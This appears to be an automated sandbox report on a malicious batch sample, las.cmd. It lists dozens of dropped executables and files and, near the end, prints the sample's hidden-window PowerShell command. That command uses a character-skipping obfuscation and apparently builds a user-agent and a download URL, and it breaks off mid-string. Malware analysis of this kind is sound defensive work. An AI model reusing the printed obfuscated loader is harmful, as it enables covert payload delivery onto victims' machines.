Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
las.cmd
|
ASCII text, with very long lines (6478), with no line terminators
|
initial sample
|
 |
|
|
C:\Program Files (x86)\AutoIt3\Au3Check.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\AutoIt3\Au3Info.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\AutoIt3\Uninstall.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\chrome.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Windows\svchost.com
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\3582-490\wab.exe
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1tbuq1lj.x5v.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ap1hgj5t.3v1.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dykonr4d.1i4.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zo2adzmy.zx5.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\tmp5023.tmp
|
Non-ISO extended-ASCII text, with no line terminators
|
modified
|
||
|
C:\Users\user\AppData\Roaming\Fettle.Han
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QXNOSMJZBFIFULAULB39.temp
|
data
|
dropped
|
||
|
C:\Windows\appcompat\Programs\Amcache.hve
|
MS Windows registry file, NT/2000 or above
|
dropped
|
There are 155 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\las.cmd" "
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -windowstyle hidden "$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';Function Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;For($Firblok=5;$Firblok
-lt $Lastelinie;$Firblok+=6){$lunelsen+=$Twistende.$Solbatteri.Invoke( $Firblok, $sublicense);}$lunelsen;}function Unschool($Squimmidge){.
($Jetmotoren) ($Squimmidge);}$Pedicures=Udvindende 'TestiMMiljloInterzShel iMil.elCol.clBifigaOvers/Stepp5Ne kw. A er0Ego
r Konku(IndskWin vii.ernin kaksdTrilloByggewKoreisDu,st O,debN XenoTPrisl Matem1Unher0 Inla.Pr,fa0Samme;Ote.t BrnesW ,isciAureanSenso6Under4glyce;
ihra NotatxSoci 6 F.ap4Terzi; Honn Gyro.rHoultv S,ns:spell1Oli.t2Indbl1s end.Capit0Kratt)C,oic genetGRysteePremac,mudskNonuboDevis/
S or2Misdd0.dgan1Misha0Stjyd0Velst1Haa d0 S,ip1.ndig NoradFOr iei nergrSe ereDy.tbfFluoroIndpaxSludr/Mod.r1spu.r2 Smut1Ugl,d.Ingra0Se
ue ';$Privileged=Udvindende 'Ob,diUA.dsesMsk,ne ,arar Matr-Jord.AUterog reeseBe trnTe.tatDis i ';$Sprngningers=Udvindende
'juncah,ripyt Sfyrtsupr.pFa.lesF,rpo:Prunt/Argum/ D.scwElskowMumifw hers.DollasacidoeSemilnmisled lyndsImparpKendea unnic
